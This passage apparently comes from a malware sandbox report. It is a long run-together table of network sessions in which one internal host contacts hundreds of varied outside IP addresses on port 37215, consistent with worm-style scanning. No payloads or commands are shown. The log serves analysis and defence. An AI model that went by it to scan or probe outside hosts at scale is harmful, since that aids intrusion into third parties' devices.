                                          14824192.168.2.2350610197.124.111.20937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14825192.168.2.2356990157.51.76.6037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14826192.168.2.233580876.3.98.18037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14827192.168.2.2348704157.7.36.25537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14828192.168.2.2337168197.103.68.19437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14829192.168.2.234267637.165.68.23337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14830192.168.2.2342966197.178.150.25437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14831192.168.2.2338264157.220.212.10437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14832192.168.2.2343376157.43.162.4337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14833192.168.2.2349272197.186.59.13637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14834192.168.2.2341348108.87.6.1537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14835192.168.2.234407641.233.42.9137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14836192.168.2.235338441.143.34.11037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14837192.168.2.2356078211.58.63.10437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14838192.168.2.233278013.205.219.11837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14839192.168.2.2343178197.235.1.6637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14840192.168.2.234238441.55.137.8237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14841192.168.2.2348148197.113.91.15037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14842192.168.2.2334786142.87.187.6337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14843192.168.2.2354152197.252.139.6137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14844192.168.2.2335892197.134.109.3237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14845192.168.2.2342468217.192.206.17437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14846192.168.2.2359784197.88.82.19237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14847192.168.2.235094498.157.186.17037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14848192.168.2.2348002157.58.122.4237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14849192.168.2.2354140197.213.126.23637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14850192.168.2.2345582157.131.106.12437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14851192.168.2.2334912218.201.105.21037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14852192.168.2.2336008141.37.184.22037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14853192.168.2.2354716157.192.219.14137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14854192.168.2.2341338157.57.123.18537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14855192.168.2.235058241.187.66.16237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14856192.168.2.233872241.221.44.9337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14857192.168.2.2358922157.192.36.21937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14858192.168.2.2333934197.47.37.2737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14859192.168.2.234664241.241.16.8937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14860192.168.2.234261641.226.181.1537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14861192.168.2.2346162220.150.113.20537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14862192.168.2.2352502118.87.83.3137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14863192.168.2.2341380157.11.108.21637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14864192.168.2.235956041.106.171.10137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14865192.168.2.2346828116.37.59.17637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14866192.168.2.2334938157.74.2.20737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14867192.168.2.2356552157.131.161.6437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14868192.168.2.234251498.185.61.14737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14869192.168.2.2360394162.30.145.17637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14870192.168.2.2356288197.138.230.15937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14871192.168.2.235583241.117.20.24537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14872192.168.2.2355344222.212.16.4837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14873192.168.2.234303481.198.51.037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14874192.168.2.2348454190.121.51.19337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14875192.168.2.233909441.232.214.23337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14876192.168.2.233945041.18.70.19537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14877192.168.2.233723241.109.163.14937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14878192.168.2.2340894157.213.85.24237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14879192.168.2.233372041.62.214.7737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14880192.168.2.2334296157.155.145.13337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14881192.168.2.2340202157.128.112.12137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14882192.168.2.2358820157.245.190.7737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14883192.168.2.2341960126.146.192.16737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14884192.168.2.2355244105.51.234.15537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14885192.168.2.2340054197.8.55.19937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14886192.168.2.2332822157.141.10.2237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14887192.168.2.2347608170.241.71.25437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14888192.168.2.234392641.40.17.14437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14889192.168.2.2336504197.126.238.937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14890192.168.2.2334188157.151.74.4137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14891192.168.2.2360210120.90.144.3937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14892192.168.2.233913041.181.31.20837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14893192.168.2.2350648197.29.52.16937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14894192.168.2.233424641.43.207.13937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14895192.168.2.2344552157.49.27.10937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14896192.168.2.233320041.186.71.25237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14897192.168.2.2359104157.57.102.6937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14898192.168.2.2357110194.98.121.16937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14899192.168.2.233760253.124.133.2737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14900192.168.2.2345882157.228.69.337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14901192.168.2.234242041.239.204.16637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14902192.168.2.234162241.145.40.21837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14903192.168.2.235611441.21.134.237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14904192.168.2.235946041.110.47.4737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14905192.168.2.2349126197.146.191.13637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14906192.168.2.234335441.181.11.10337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14907192.168.2.233568480.142.159.17237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14908192.168.2.2349040168.192.75.18537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14909192.168.2.2340228197.240.166.9637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14910192.168.2.2339868197.3.224.7237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14911192.168.2.2353786203.36.181.3837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14912192.168.2.2334078197.83.120.4937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14913192.168.2.2338086157.217.16.3037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14914192.168.2.234133441.101.29.23437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14915192.168.2.2339126157.15.47.24037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14916192.168.2.2345276197.60.87.14437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14917192.168.2.2337662197.31.47.9437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14918192.168.2.2358094197.88.132.3637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14919192.168.2.2346824197.72.19.10037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14920192.168.2.2336982157.12.92.9137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14921192.168.2.2346314197.111.229.11237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14922192.168.2.233378841.247.69.4737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14923192.168.2.2352220124.20.229.5437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14924192.168.2.235912641.33.84.22137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14925192.168.2.2339084197.144.207.11937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14926192.168.2.2339988157.13.147.11137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14927192.168.2.2343908197.219.165.10637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14928192.168.2.2344706221.239.145.1437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14929192.168.2.2342746197.97.178.11737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14930192.168.2.236082641.39.44.3237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14931192.168.2.2347834197.230.236.17337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14932192.168.2.235507041.123.210.15537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14933192.168.2.2345230197.147.158.7737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14934192.168.2.2334200157.79.100.737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14935192.168.2.2350278157.60.58.737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14936192.168.2.234615298.110.58.17837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14937192.168.2.2332902197.136.71.20537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14938192.168.2.236038441.134.188.24237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14939192.168.2.2359242157.99.65.20237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14940192.168.2.2338808157.164.51.2237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14941192.168.2.2332968142.100.172.937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14942192.168.2.2349674157.252.120.11137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14943192.168.2.23369729.98.246.14137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14944192.168.2.2357422157.210.37.3137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14945192.168.2.2351776197.182.32.6537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14946192.168.2.2354162194.227.31.3337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14947192.168.2.2336890221.219.154.137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14948192.168.2.234288641.105.73.8137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14949192.168.2.234161841.121.106.16537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14950192.168.2.233722641.145.47.8437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14951192.168.2.2347368157.254.148.16037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14952192.168.2.2347670157.90.182.8237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14953192.168.2.2359714197.80.237.12837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14954192.168.2.234231041.210.205.20337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14955192.168.2.2344100157.184.48.10937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14956192.168.2.235091232.248.145.5137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14957192.168.2.233502886.69.233.2337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14958192.168.2.2355512157.77.184.22737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14959192.168.2.2338822197.97.138.10237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14960192.168.2.235524241.205.117.11237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14961192.168.2.2343992200.0.38.11437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14962192.168.2.2342576157.88.105.17237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14963192.168.2.2341726157.214.192.7737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14964192.168.2.2335112197.68.77.20237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14965192.168.2.2343902157.253.199.20337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14966192.168.2.234246441.249.246.19137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14967192.168.2.2337152197.23.114.1137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14968192.168.2.2342534157.254.59.21437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14969192.168.2.2344910197.89.39.20937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14970192.168.2.2356476197.31.106.11837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14971192.168.2.2352466157.232.168.9937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14972192.168.2.2342618152.7.130.16037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14973192.168.2.2342832197.118.70.23637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14974192.168.2.235565641.7.214.1237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14975192.168.2.2336576197.177.97.12637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14976192.168.2.2357504169.217.118.5037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14977192.168.2.2333916197.155.12.9637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14978192.168.2.235646041.167.131.14837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14979192.168.2.233792441.66.156.9137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14980192.168.2.2344210197.180.49.22737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14981192.168.2.234869041.143.209.17437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14982192.168.2.2346628197.209.32.7137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14983192.168.2.235805641.181.95.4237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14984192.168.2.235629241.101.15.18037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14985192.168.2.235079259.18.146.19137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14986192.168.2.235129290.96.30.21137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14987192.168.2.235783241.98.232.137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14988192.168.2.235318041.45.203.17037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14989192.168.2.234800441.243.58.21337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14990192.168.2.235233680.134.193.20337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14991192.168.2.2346950157.10.154.19537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14992192.168.2.2357648157.214.112.9837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14993192.168.2.235217441.90.232.25537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14994192.168.2.233735641.7.254.15637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14995192.168.2.233898044.235.129.4037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14996192.168.2.2355208197.69.181.22637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14997192.168.2.2352408157.150.68.13737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14998192.168.2.2343224157.80.24.10737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14999192.168.2.2337776197.109.210.9137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15000192.168.2.233571831.176.30.1937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15001192.168.2.2350732157.197.240.22037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15002192.168.2.2350838166.25.204.23537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15003192.168.2.2336520186.45.198.6337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15004192.168.2.234738441.42.33.21737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15005192.168.2.2336010126.44.253.14237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15006192.168.2.2349810160.199.237.3637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15007192.168.2.2333762195.71.251.9137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15008192.168.2.2353040197.179.102.14537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15009192.168.2.234389041.140.208.4137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15010192.168.2.2338416113.52.213.10937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15011192.168.2.2345042199.178.89.8837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15012192.168.2.235607041.193.24.1237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15013192.168.2.233767441.194.13.2637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15014192.168.2.2350844136.58.231.6337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15015192.168.2.2344006157.175.30.8337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15016192.168.2.2340880157.97.55.20837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15017192.168.2.2340030157.202.189.8737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15018192.168.2.234512641.240.199.7837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15019192.168.2.235057841.252.94.25137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15020192.168.2.233362241.209.253.16137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15021192.168.2.2351744157.152.68.9637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15022192.168.2.2348334157.165.232.4937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15023192.168.2.2353586116.98.121.5337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15024192.168.2.2352868188.24.95.11237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15025192.168.2.235475041.18.138.3537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15026192.168.2.2335378157.90.180.10537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15027192.168.2.234738041.58.150.5137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15028192.168.2.234110641.46.218.22737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15029192.168.2.2352920157.229.249.4437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15030192.168.2.2353634141.254.103.18637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15031192.168.2.235830041.213.158.5737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15032192.168.2.2334536157.150.190.9137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15033192.168.2.2336782157.46.105.13737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15034192.168.2.235836041.111.142.6037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15035192.168.2.233510241.121.115.18437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15036192.168.2.2338594157.150.122.10537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15037192.168.2.2354288157.242.117.7737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15038192.168.2.2342578121.95.56.9337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15039192.168.2.2344134158.208.202.17437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15040192.168.2.2334072197.224.245.12937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15041192.168.2.236030241.203.218.4037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15042192.168.2.2351894157.40.183.2437215
